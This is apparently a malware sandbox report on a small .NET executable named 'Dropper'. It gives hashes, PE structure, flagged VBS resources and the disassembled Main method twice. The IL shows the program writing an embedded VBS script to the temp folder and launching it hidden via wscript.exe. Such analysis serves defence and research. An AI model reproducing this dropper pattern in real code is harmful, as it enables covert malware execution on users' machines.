Malicious
Malicious

53c64a9d1b6a2f6f871830424454ba0c

PE Executable
|
MD5: 53c64a9d1b6a2f6f871830424454ba0c
|
Size: 32.77 KB
|
application/x-dosexec

Print
Infection Chain
Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Very low

Hash
 Hash Value
MD5
53c64a9d1b6a2f6f871830424454ba0c
Sha1
178d4ae72585ed7b9756a6f86f1b2911a5d441ac
Sha256
a539471a5811cdbd9f80e7d09804ae8b2f9986798a7c0f3b0d00addba087cac1
Sha384
2250b1b8eb17b2245d3d50ce3dd1edf7d32d66e0c5da70bacf3ac928fd5d4bfe38dceda990d08b9865db46f1e68bb646
Sha512
103d779f069bba6a9909f23ca8450bfefd921871371de11a1e56f1d3ed0f98681f1fa3010584bc8b07f59b98ba3c3c0a40b7b90dd304e657c8f064bcd6ccbbe3
SSDeep
768:AA5Igz9dwe/Y5Plx58cqPqjM6RF2UHG58KR9W:NuOdwe/Y5D2cqPF4A5BR9W
TLSH
4EE2E52AD554AFF0CB2F61B2AC97284641904325A674390E75CE9ADC2F34364CF991EF

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
53c64a9d1b6a2f6f871830424454ba0c
Malicious
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
Malicious
69763daebbd3e.vbs
Malicious
69763daebbd3e.vbs.deobfuscated.vbs
Malicious
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

69763daebbd3e.exe
Full Name

69763daebbd3e.exe
EntryPoint

System.Void Dropper.Program::Main(System.String[])
Scope Name

69763daebbd3e.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

69763daebbd3e
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

4
Main Method

System.Void Dropper.Program::Main(System.String[])
Main IL Instruction Count

96
Main IL

nop <null> nop <null> ldstr 69763daebbd3e.vbs stloc.0 <null> call System.String System.IO.Path::GetTempPath() stloc.1 <null> ldloc.1 <null> ldloc.0 <null> call System.String System.IO.Path::Combine(System.String,System.String) stloc.2 <null> call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() ldloc.0 <null> callvirt System.IO.Stream System.Reflection.Assembly::GetManifestResourceStream(System.String) stloc.3 <null> nop <null> ldloc.3 <null> ldnull <null> ceq <null> ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_0035: ldloc.2 leave IL_00D9: nop ldloc.2 <null> ldc.i4.2 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode) stloc.s V_4 nop <null> ldloc.3 <null> ldloc.s V_4 callvirt System.Void System.IO.Stream::CopyTo(System.IO.Stream) nop <null> nop <null> leave.s IL_005F: nop ldloc.s V_4 ldnull <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_005E: endfinally ldloc.s V_4 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> nop <null> leave.s IL_0075: nop ldloc.3 <null> ldnull <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_0074: endfinally ldloc.3 <null> callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> newobj System.Void System.Diagnostics.Process::.ctor() stloc.s V_5 ldloc.s V_5 callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldstr wscript.exe callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) nop <null> ldloc.s V_5 callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldstr " ldloc.2 <null> ldstr " call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) nop <null> ldloc.s V_5 callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) nop <null> ldloc.s V_5 callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) nop <null> ldloc.s V_5 callvirt System.Boolean System.Diagnostics.Process::Start() pop <null> nop <null> leave.s IL_00D8: nop pop <null> nop <null> nop <null> leave.s IL_00D8: nop nop <null> nop <null> ret <null>
Module Name

69763daebbd3e.exe
Full Name

69763daebbd3e.exe
EntryPoint

System.Void Dropper.Program::Main(System.String[])
Scope Name

69763daebbd3e.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

69763daebbd3e
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

4
Main Method

System.Void Dropper.Program::Main(System.String[])
Main IL Instruction Count

96
Main IL

nop <null> nop <null> ldstr 69763daebbd3e.vbs stloc.0 <null> call System.String System.IO.Path::GetTempPath() stloc.1 <null> ldloc.1 <null> ldloc.0 <null> call System.String System.IO.Path::Combine(System.String,System.String) stloc.2 <null> call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() ldloc.0 <null> callvirt System.IO.Stream System.Reflection.Assembly::GetManifestResourceStream(System.String) stloc.3 <null> nop <null> ldloc.3 <null> ldnull <null> ceq <null> ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_0035: ldloc.2 leave IL_00D9: nop ldloc.2 <null> ldc.i4.2 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode) stloc.s V_4 nop <null> ldloc.3 <null> ldloc.s V_4 callvirt System.Void System.IO.Stream::CopyTo(System.IO.Stream) nop <null> nop <null> leave.s IL_005F: nop ldloc.s V_4 ldnull <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_005E: endfinally ldloc.s V_4 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> nop <null> leave.s IL_0075: nop ldloc.3 <null> ldnull <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_0074: endfinally ldloc.3 <null> callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> newobj System.Void System.Diagnostics.Process::.ctor() stloc.s V_5 ldloc.s V_5 callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldstr wscript.exe callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) nop <null> ldloc.s V_5 callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldstr " ldloc.2 <null> ldstr " call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) nop <null> ldloc.s V_5 callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) nop <null> ldloc.s V_5 callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) nop <null> ldloc.s V_5 callvirt System.Boolean System.Diagnostics.Process::Start() pop <null> nop <null> leave.s IL_00D8: nop pop <null> nop <null> nop <null> leave.s IL_00D8: nop nop <null> nop <null> ret <null>
53c64a9d1b6a2f6f871830424454ba0c (32.77 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙